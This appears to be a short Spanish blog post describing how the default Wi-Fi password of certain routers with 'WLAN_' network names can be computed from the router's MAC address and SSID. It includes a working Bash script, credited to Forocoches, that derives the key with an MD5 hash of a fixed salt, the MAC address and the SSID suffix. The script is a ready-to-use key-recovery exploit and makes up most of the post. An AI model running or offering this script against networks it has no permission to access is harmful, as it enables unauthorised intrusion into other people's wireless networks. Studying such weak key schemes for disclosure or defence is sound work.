Básicamente consiste en generar el hash md5 de una cadena compuesta de la siguiente manera:
La subcadena bcgbghgg más 12345678ABCD siendo los 8 primeros carácteres coincidentes con la dirección MAC del router y los 4 últimos carácteres coincidentes con los 4 carácteres finales del SSID de la red.
Así de fácil y rápido. Ni capturar tráfico ni generar diccionarios. Bueno, sí, generas un diccionario de una sola entrada :)
Como muestra de implementación, un script en Bash sacado de Forocoches:
#!/bin/bash
echo CalcWLAN by a.s.r
if [ $# -ne 2 ]
then
echo "Usage: $0
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi
HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)
echo "La puta clave es $KEY"
No hay comentarios:
Publicar un comentario